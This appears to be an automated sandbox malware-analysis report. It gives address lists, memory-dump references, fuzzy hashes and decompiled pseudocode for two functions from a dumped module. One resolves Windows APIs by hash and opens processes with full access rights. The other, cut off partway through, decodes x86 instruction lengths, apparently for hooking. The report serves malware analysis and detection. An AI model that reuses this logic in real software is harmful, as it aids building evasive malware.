0x7056a776
0x7056a778
0x7056a796
0x7056a798
0x7056a79a
0x7056a7ad
0x7056a7cc
0x7056a7d2
0x7056a7d5
0x7056a7ec
0x7056a808
0x7056a80a
0x7056a80a
0x7056a80a
0x7056a80a
0x7056a79a
0x00000000
0x7056a778
0x7056a738
0x7056a738
0x7056a73a
0x7056a74b
0x7056a74d
0x7056a74f
0x00000000
0x00000000
0x7056a75b
0x7056a75c
0x7056a763
0x00000000
0x00000000
0x00000000
0x7056a763
0x7056a751
0x7056a754
0x00000000
0x00000000
0x7056a80d
0x7056a80d
0x7056a80e
0x7056a80e
0x00000000
0x7056a601
0x7056a603
0x7056a603
0x7056a605
0x7056a60c
0x7056a61a
0x7056a61c
0x7056a620
0x7056a624
0x7056a626
0x7056a654
0x7056a657
0x7056a65c
0x7056a660
0x7056a665
0x7056a66c
0x7056a671
0x7056a673
0x7056ac3a
0x7056ac4b
0x7056ac6b
0x7056ac70
0x7056ac70
0x7056a689
0x7056a68e
0x7056a68e
0x7056a68e
0x7056a68e
0x7056a6a0
0x7056a6a2
0x7056a6a4
0x7056a6b5
0x7056a6b5
0x7056a6bb
0x7056a6c0
0x7056a6c4
0x7056a6ca
0x7056a6d1
0x7056a6d6
0x7056a6d8
0x7056abee
0x7056abff
0x7056ac20
0x7056ac25
0x7056ac25
0x7056a6ef
0x7056a6f4
0x7056a6f4
0x7056a6f4
0x7056a6f4
0x7056a6f7
0x7056a6f7
0x00000000
0x7056a6f7
0x7056a62a
0x7056a62a
0x7056a62c
0x7056a63d
0x7056a63f
0x7056a641
0x00000000
0x00000000
0x7056a64d
0x7056a64e
0x7056a652
0x00000000
0x00000000
0x00000000
0x7056a652
0x7056a643
0x7056a646
0x00000000
0x00000000
0x7056a6f8
0x7056a6f8
0x7056a6f9
0x7056a6f9
0x00000000
0x7056a605
0x7056a5fb

Strings

, xrefs: 7056ABB3

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 168210105720c42c8c5f25098497c30f8989faf63b92b5b237d4659a85e485b8
Instruction ID: 64ccf841e65ffaeb7e5e9dc682a380eb59ba6a4e0732e2496425aa5ee08d091b
Opcode Fuzzy Hash: 168210105720c42c8c5f25098497c30f8989faf63b92b5b237d4659a85e485b8
Instruction Fuzzy Hash: 21127F719083459FC715DF24C886A6EBBF5EFD5A10F108A2EF49A972A0DB30ED41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 705684E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E705684E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E7056B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E7056F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E7056F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E7057218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E7056F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E7056F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E7056F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E7056F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E7056F558(_t435, _t451);
										E7057382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7056F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E7056F8C4(_t435, E7056F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E70572F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E7056F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E7056F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E7056F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E7056F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E7056F558( *(_t458 + 4), _t453);
										E7057382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7056F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E7056F8C4( *(_t458 + 4), E7056F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E7056F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E7056F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E70572F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7056F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E7056F8C4( *(_t458 + 4), E7056F568( *_t458) + 4);
										 *(E7056F558( *(_t458 + 4), E7056F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E7056F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E7056F8C4( *((intOrPtr*)(_t458 + 0x74)), E7056F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E7056F558( *((intOrPtr*)(_t458 + 0x74)), E7056F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E7056F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E7056F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E7056F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E7056F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E7056F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E7056F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E7056F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E7057382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7056F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E7056F8C4( *(_t458 + 4), E7056F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E7056F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E7056F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E7056F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E7056F558(_t324, _t435);
										E7057382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7056F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E7056F8C4(_t324, E7056F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E7056F8C4( *(_t458 + 4), E7056F568( *_t458) + 4);
								 *(E7056F558( *(_t458 + 4), E7056F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E7056F8C4(_t324, E7056F568(_t324) + 4);
								 *((intOrPtr*)(E7056F558(_t324, E7056F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E7056F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E7056F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E7056F558(_t458 + 0x14, 0);
						_t180 = E70572878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7056F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E7056F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E7056B680(_t458 + 0x34);
								E7056B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E7056CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E7056C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E7056F8C4(_t458 + 0x14, E7056F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E7056F558(_t458 + 0x14, E7056F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E70572F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E7056F8C4(_t458 + 0x40, E7056F568(_t458 + 0x3c) + 4);
										 *(E7056F558(_t458 + 0x40, E7056F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E7056CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E7056F558( *(_t458 + 4), _t437 * 4);
												_t212 = E7056F558(_t458 + 0x40, _t437 * 4);
												E70568C14( *_t211, E7057034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E7056CDE0(_t458 + 0x4c, __eflags);
						L59:
						E7056B680(_t458 + 0x34);
						E7056B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x705684e4
0x705684e8
0x705684f1
0x705684f7
0x705684fb
0x705684ff
0x7056850a
0x7056850e
0x70568513
0x7056851b
0x7056852b
0x00000000
0x7056852d
0x70568535
0x7056853c
0x7056853c
0x70568a8f
0x70568a91
0x70568ad2
0x70568ad4
0x70568ae3
0x70568aef
0x70568ad6
0x70568ade
0x70568af5
0x70568afa
0x00000000
0x70568ae0
0x70568ae2
0x00000000
0x70568ae2
0x70568ade
0x00000000
0x70568546
0x7056854a
0x7056854d
0x70568553
0x70568553
0x70568555
0x7056855c
0x7056856a
0x7056856c
0x70568570
0x70568572
0x7056859e
0x705685a2
0x705685a7
0x705685ac
0x705685b0
0x705685b4
0x705685bb
0x705685c0
0x705685c2
0x70568b51
0x70568b60
0x70568b7f
0x70568b84
0x70568b84
0x705685d5
0x705685da
0x705685de
0x705685de
0x705685de
0x705685ef
0x705685f1
0x705685f3
0x70568604
0x70568604
0x70568609
0x7056860e
0x70568612
0x70568617
0x7056861e
0x70568623
0x70568625
0x70568b13
0x70568b1f
0x70568b39
0x70568b3e
0x70568b3e
0x7056863b
0x70568640
0x70568644
0x70568644
0x70568644
0x70568644
0x70568647
0x70568647
0x70568574
0x70568576
0x70568576
0x70568578
0x70568584
0x7056858b
0x7056858d
0x00000000
0x00000000
0x70568599
0x7056859a
0x7056859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x7056859c
0x7056858f
0x70568592
0x00000000
0x00000000
0x70568594
0x70568592
0x70568648
0x7056864c
0x7056864d
0x7056864d
0x70568555
0x70568655
0x7056865a
0x70568660
0x70568660
0x70568662
0x70568669
0x70568677
0x70568679
0x7056867d
0x7056867f
0x70568681
0x705686bc
0x705686cb
0x705686cd
0x705686cf
0x705686ed
0x705686ef
0x705686f1
0x70568703
0x70568721
0x7056872a
0x7056872d
0x7056873b
0x7056874c
0x7056876a
0x7056876c
0x70568770
0x70568770
0x70568770
0x705686f1
0x70568683
0x70568687
0x70568687
0x7056868c
0x70568693
0x705686a2
0x705686a9
0x705686ab
0x00000000
0x00000000
0x705686b7
0x705686b8
0x705686ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x705686ba
0x705686ad
0x705686b0
0x00000000
0x00000000
0x705686b2
0x705686b0
0x70568772
0x70568772
0x70568773
0x70568773
0x70568662
0x70568781
0x70568786
0x7056878a
0x7056878e
0x70568794
0x70568796
0x70568798
0x705687a2
0x705687a2
0x705687a4
0x705687a7
0x705687a9
0x705687b1
0x705687b8
0x705687bc
0x705687bf
0x00000000
0x00000000
0x705688bb
0x705688bc
0x705688be
0x00000000
0x00000000
0x00000000
0x705688be
0x705687c5
0x705687c8
0x705687d1
0x705687d6
0x705687d8
0x705687e4
0x705687e8
0x705687ed
0x705687f1
0x70568bce
0x70568be2
0x70568c04
0x70568c09
0x70568c09
0x70568807
0x7056880c
0x70568810
0x70568810
0x70568810
0x70568810
0x70568815
0x7056881a
0x7056881c
0x70568820
0x70568827
0x7056882c
0x7056882e
0x70568b8f
0x70568b9e
0x70568bb7
0x70568bbc
0x70568bbc
0x70568841
0x70568846
0x7056884a
0x7056884a
0x7056884a
0x7056885c
0x7056887d
0x70568885
0x70568893
0x705688b1
0x705688b7
0x705688b7
0x705687c8
0x70568798
0x705688c4
0x705688c6
0x705688ca
0x705688d3
0x705688de
0x705688e2
0x705688eb
0x705688f0
0x705688f6
0x705688f7
0x705688fb
0x705688ff
0x70568906
0x70568908
0x70568a48
0x70568a59
0x70568a60
0x70568a67
0x70568a67
0x70568a6a
0x70568a6d
0x70568a70
0x70568a76
0x00000000
0x70568a78
0x70568a78
0x70568a7b
0x70568a94
0x70568aac
0x70568aaf
0x70568ab4
0x70568abe
0x70568ac1
0x70568ac4
0x70568acd
0x00000000
0x00000000
0x00000000
0x70568a7b
0x00000000
0x7056890e
0x70568910
0x70568910
0x70568912
0x70568916
0x7056891b
0x7056891d
0x70568921
0x70568924
0x7056892c
0x7056892e
0x00000000
0x00000000
0x70568945
0x70568960
0x70568962
0x70568970
0x70568975
0x70568977
0x70568994
0x70568998
0x7056899a
0x00000000
0x7056899c
0x7056899c
0x7056899f
0x705689c0
0x705689df
0x705689e5
0x705689e8
0x705689ed
0x705689ee
0x705689f5
0x00000000
0x705689fb
0x705689fd
0x705689fd
0x705689ff
0x70568a0b
0x70568a17
0x70568a39
0x70568a3e
0x70568a3f
0x70568a3f
0x00000000
0x705689ff
0x00000000
0x00000000
0x00000000
0x7056899f
0x70568979
0x70568979
0x7056897f
0x70568981
0x70568982
0x70568983
0x70568984
0x70568988
0x7056898c
0x7056898e
0x7056898f
0x7056898f
0x00000000
0x70568977
0x705689a5
0x70568a7d
0x70568a81
0x70568a8a
0x00000000
0x70568a8a
0x00000000
0x70568908

Strings

, xrefs: 70568AD6

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: e015684817e6f745e60c3c7c35eab759ef6b6504672715f8c2743df5a0643160
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: C3125D71608344DFC714DF24C985A6EBBF5AFE5A10F104A2EF5AA972A0DB30ED44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 705792DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E705792DC(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E705735D4( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
